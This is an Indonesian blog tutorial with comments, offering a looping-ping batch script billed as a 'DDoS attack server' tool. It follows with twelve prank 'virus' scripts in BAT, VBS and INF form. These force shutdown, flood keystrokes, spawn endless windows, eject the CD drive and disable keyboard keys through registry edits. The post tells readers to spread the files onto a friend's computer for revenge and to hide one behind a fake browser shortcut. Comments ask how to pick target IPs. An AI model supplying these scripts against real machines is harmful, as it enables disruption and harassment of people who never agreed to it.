Membuat Tools Hacker Sederhana [UPDATE 2015] Tutorial Hacker




Kali Ini Saya Akan Ajarkan Cara Membuat Tools Hacker Sendiri
Dengan Sederhana.
OK, Tanpa Basa Basi Lagi, Siap kan Alat-Alat Nya .
1. Notepad .
2. Script DDos .

Tonton video tutorialnya disini

SUBSCRIBE: https://www.youtube.com/channel/UCgKb8vM5YmMwTBEY1vr6N5A/feed

INSTAGRAM: https://instagram.com/coay14/

TWITTER: https://twitter.com/
  1. Buka Notepad.
  2. Copy & Paste Kan Script Di Bawah Ini :


@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : Alhamim             +
echo + Visite : alhamimdwiputra.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

     3.   Simpan Dengan Type "All Files" Dan Beri Nama Sesuka Anda Dengan Format .bat ( Contoh : Ddos.bat )


Cara Pakai :

Pada menu Server-Target -> *    Masukan IP / Host Target    *
masukan alamat web yang ingin di DDOS.
________________________________________________________________

KUMPULAN CARA HACKER SEDERHANA JAIL 

Berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda,
dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya :

TRIK 1 - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN

TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

TRIK 3 - Membuat Pesan Jail mucul terus 
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file :All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.


TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,

TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus

TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file :All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya

TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : xhack.vbs

TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus

TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.

TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
-----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT

TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------

start

start

start

start

start

start

start

start

start

start

start

start

-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

TRIK 12 - Cara Mematikan Tombol Keyboard 
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

—————————————

—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.


SUBSCRIBE: https://www.youtube.com/channel/UCgKb8vM5YmMwTBEY1vr6N5A/feed

INSTAGRAM: https://instagram.com/coay14/

TWITTER: https://twitter.com/

sumber artikel hack : kidzoom cara hacker komputer sederhana
Previous
Next Post »

74 komentar

Click here for komentar
Method Blaze
admin
19 Februari 2013 15.49 ×

wEw keren niie bang

Reply
avatar
ITneT Padang
admin
19 Februari 2013 15.59 ×

Mntaph...ini dia yang ane cari trims gan..

Keren tips nya..
Jangan lpa mampir disini gan

Fecebookan-Special sharing fitur dan mamfaat facebook

Reply
avatar
19 Februari 2013 16.03 ×

Nice inpo sob :
klo boleh tau gunanya wat apa ya ??

Reply
avatar
Blog Bisnis
admin
19 Februari 2013 16.28 ×

Waduh belajar ngehack nih sob, nice share

Reply
avatar
19 Februari 2013 16.51 ×

wew mantappp ...
Kapan2 dicoba lah :)

mampir :)

Reply
avatar
19 Februari 2013 19.04 ×

wEw, heker nih mantep bang

Reply
avatar
19 Februari 2013 19.26 ×

wihh, ajibb bnerr gan info'nya..
mau nyoba akh ^^
mampir juga yyaaa

Reply
avatar
19 Februari 2013 19.41 ×

beeeh serem nih. Makasih kawan infonya. Coba nyok :D

Reply
avatar
19 Februari 2013 21.12 ×

thx infonya sangat bermanfaat Commant Back ia and jangan lupa Follow back jga untuk mempererat pertemanan di dunia maya http://rizkyadipranata04.blogspot.com/, salam blogwalkin kbw20 gan

Reply
avatar
19 Februari 2013 23.31 ×

Fungsinya buat apa an ya ?

Reply
avatar
20 Februari 2013 08.29 ×

wew,.
tak coba ya gan.,

makasih infonya :D

Reply
avatar
20 Februari 2013 13.26 ×

hmm sip tutorialnya bos, tapi fungsinya buat apa nie mohon pencerahannya

http://blankon-ku.blogspot.com

Reply
avatar
20 Februari 2013 13.28 ×

blogwalking http://dms-4rtdark.blogspot.com

Reply
avatar
Djaloe
admin
20 Februari 2013 13.28 ×

langsung di parktekin biar ingat.. tnhks infonya gan

Reply
avatar
20 Februari 2013 14.24 ×

terima kasih atas informasinya gan. mau nyoba praktek dulu nih. hehehe

Reply
avatar
20 Februari 2013 15.18 ×

Nice Sob


visit And Comment
http://zona-dikhy.blogspot.com/

Reply
avatar
de eka Sas
admin
21 Februari 2013 07.45 ×

waduh,susah ya... saya nyerah dah...
hahahahaha....

Reply
avatar
22 Februari 2013 18.40 ×

Hehe terimakasih..

Okey gan :)

Reply
avatar
22 Februari 2013 18.41 ×

iya :)
, jadi gini nanti status facebook kamu bakalan banyak yang like nya sob .. :) ya pake ini (likelo.com)

Reply
avatar
jempot2
admin
22 Februari 2013 23.05 ×

ahli bat files nih, jaman dos dulu, bat files ini paling megang perananan. terima kasih untuk tutorialnya. salam

Reply
avatar
FERNANDO
admin
17 Maret 2013 20.17 ×

gimana sih ,kok cuman nonggol tulisan biru alamat IP doang -__-" ??

Reply
avatar
17 Maret 2013 20.28 ×

Masukan IP Target nya sobat fernando :)

Reply
avatar
18 Maret 2013 02.22 ×

;wah, bisa jadi craker nih !!! ckckc

visit juga yah http://menyereading.blogspot.com

Reply
avatar
DINA SHOP
admin
18 April 2013 00.37 ×

Produk dijamin asli.
Dina Shop : Barang yang Kami Tawarkan Semuanya Barang ASLI ORGINAL Garansi Resmi Distributor dan gransi TAM.
Semua Produk Kami Baru dan Msh Tersegel dLm BOX_nya.
BERMINAT HUB-SMS:0896-9198-6257 ATAU KLIK WEBSET RESMI KAMI DI http://dina-shop7.blogspot.com/.
BlackBerry>Samsung>Nokia>Apple>Acer>Dell>Nikon>DLL

BLACKBERRY
Asli Buatan Canada.
HARGA PROMO

BlackBerry 8230 Rp. 500.000
BlackBerry 8330 Rp. 500.000
BlackBerry 8700 Rp. 500.000
BlackBerry 8830 World Edition Rp. 500.000
BlackBerry 9330 kepler Rp. 1.100.000
BlackBerry Bold 9000 Rp. 1.100.000
BlackBerry Bold 965 Rp. 900.000
BlackBerry Bold 9700 (Onyx) Rp. 700.000
BlackBerry Bold 9780 (Onyx II) Rp. 800.000
BlackBerry Bold 9790 (Bellagio) Rp. 1,100.000
BlackBerry Bold Touch 9900 (Dakota) Rp. 1,500.000
BlackBerry Bold Touch 9930 (Montana) Rp. 1,200.000
BlackBerry Curve 3G 9300 (Kepler) Rp. 700.000
BlackBerry Curve 3G 9330 Rp. 700.000
BlackBerry Curve 8310 Rp. 550.000
BlackBerry Curve 8320 Rp. 600.000
BlackBerry Curve 8520 (Gemini) Rp. 500.000
BlackBerry Curve 8530 Rp. 550.000
BlackBerry Curve 8900 (Javelin) Rp. 700.000
BlackBerry Curve 9220 (Davis) Rp. 650.000
BlackBerry Curve 9320 (Armstrong) Rp. 700.000
BlackBerry curve 9330 cdma-berrindo Rp. 800.000
BlackBerry Curve 9350 Rp. 800.000
BlackBerry Curve 9360 (Apollo) Rp. 950.000
BlackBerry Curve 9370 Rp. 800.000
BlackBerry Curve 9380 (Orlando) Rp. 900.000
BlackBerry Pearl 3G 9100 Rp. 700.000
BlackBerry Pearl 3G 9105 Rp. 700.000
BlackBerry Pearl 8100 Rp. 500.000
BlackBerry Pearl 8120 Rp. 500.000
BlackBerry Pearl 8130 Rp. 500.000
BlackBerry Pearl Flip 8220 Rp. 600.000
BlackBerry Pearl Flip 8230 Rp. 500.000
BlackBerry PlayBook Rp. 1,200.000
BlackBerry PlayBook 64GB Rp. 1,200.000
BlackBerry PlayBook-32GB Rp. 1,200.000
BlackBerry porsche design p'9981 Rp. 4,8250.000
BlackBerry porsche design p'9981 Rp. 4,4500.000
BlackBerry Storm 9500 Rp. 700.000
BlackBerry Storm2 9520 Rp. 700.000
BlackBerry Storm2 9530 Rp. 600.000
BlackBerry Storm2 9550Rp. 650.000
BlackBerry Style 9670 Rp. 650.000
BlackBerry Torch 9800 Rp. 1,200.000
BlackBerry Torch 9810 Rp. 1,350.000
BlackBerry Torch 9850 Rp. 1,100.000
BlackBerry Torch 9860 (Monza) Rp. 1,400.000
BlackBerry Tour 9630 Rp. 650.000

Reply
avatar
Anonim
admin
5 Mei 2013 06.57 ×

bang simpan nya di mana

Reply
avatar
Anonim
admin
24 Mei 2013 22.52 ×

gk ada videonya ya gan ?
ane kurang faham

Reply
avatar
28 Mei 2013 08.08 ×

gan kyk mana cari host nya?

Reply
avatar
Anonim
admin
11 Agustus 2013 14.34 ×

gan klo pke windows xp hrus pke apa gan untuk naruh tulisan yg dikopi itu gan?????

bls ya gan

Reply
avatar
Anonim
admin
11 Agustus 2013 14.50 ×

Gan ini Kegunaan nya untuk apa gan??


jwab ya gan

Reply
avatar
Anonim
admin
11 Agustus 2013 14.51 ×

Sip gan

Reply
avatar
15 Oktober 2013 16.17 ×

Bang kalau di buat hacks tool game bisa gak?
mohon reply ya ^^

Reply
avatar
waren Sedi
admin
19 Desember 2013 08.13 ×

cara gunain nya gimana gan ?

Reply
avatar
18 Maret 2014 14.29 ×

ip/host target nya apa

Reply
avatar
18 Maret 2014 16.23 ×

Liat video nya di youtube. http://www.youtube.com/watch?v=E3YRSfFStYs

Reply
avatar
24 Maret 2014 16.54 ×

mas,contoh ip/host targetnya apa?

Reply
avatar
dewi estina
admin
14 Mei 2014 08.29 ×

gan kalo udah, attacking server bla, bla, bla. itu kan sukses.
tapi saya masih gak paham gan.

Reply
avatar
dewi estina
admin
14 Mei 2014 08.32 ×

gan. punya saya sdah sukses. tapi bingung, stelah itu diapakan.

Reply
avatar
16 Mei 2014 11.51 ×

sumpah keren gan. nyoba ah..
komen balik yah http://intan-aulia-kolbi.blogspot.com

Reply
avatar
Anonim
admin
27 Mei 2014 16.08 ×

gan ini untuk hack apa?

Reply
avatar
Anonim
admin
17 Juli 2014 12.46 ×

Work 100% gak?

Reply
avatar
fikri adja
admin
18 Agustus 2014 18.24 ×

ip itu apa sama host target ajarin donk ni nama fb gue Muhammad solehudin al fikri cari foto kata2

Reply
avatar
fikri adja
admin
19 Agustus 2014 13.38 ×

apa itu ip target

Reply
avatar
31 Agustus 2014 18.18 ×

ALL: Work 100% Pake Size nya terserah agan semua. Silahkan bebas asal mematuhi peraturan internet.

Reply
avatar
JordyMaulana
admin
19 Oktober 2014 10.23 ×

Ip target tu web yang akan kita serang,kalo gk salah lho

Reply
avatar
JordyMaulana
admin
19 Oktober 2014 10.25 ×

bos,ini server atttack sebenernya gunanya apa si?

Reply
avatar
Anonim
admin
10 November 2014 15.20 ×

Keren se, tp kalo dibuat Cracking ama orang juga gak bagus

Reply
avatar
rahman layn
admin
22 November 2014 22.24 ×

gan, klw di buat ngehack game bisa gk? gmn carax?

Reply
avatar
Kholid Coy
admin
29 Desember 2014 21.53 ×

web download Script DDos nya dimna mas

Reply
avatar
30 Desember 2014 08.38 ×

packet size maksudnya apa gan

Reply
avatar
30 Desember 2014 08.39 ×

apa yang harus di ketik

Reply
avatar
Anonim
admin
28 Januari 2015 13.44 ×

sepertinya tidak work

Reply
avatar
jiu chiang
admin
26 Maret 2016 15.27 × Komentar ini telah dihapus oleh pengarang.
avatar
Unknown
admin
14 Juni 2016 14.08 ×

gan ada tulisan paket size.. maksut paket size nya apa

Reply
avatar
14 Juni 2016 14.09 ×

kalau cara hialangin virusnya gmna? soalnya saya coba di laptop sendiri

Reply
avatar
21 Juni 2016 08.47 ×

kalo di tanya gunanya diem wae , ngak mau bales , kwoakwoakw , >_<

Reply
avatar
satsuo chan
admin
30 Januari 2017 23.31 ×

mau aja di begoin, hack apanya...scrip cuman printah tampilkan apa yang kalian perintahkan, saran klo posting jangan sampah...

Reply
avatar
Exos Wiliam
admin
29 Maret 2017 20.49 ×

Copas mas dan terlalu basic

Reply
avatar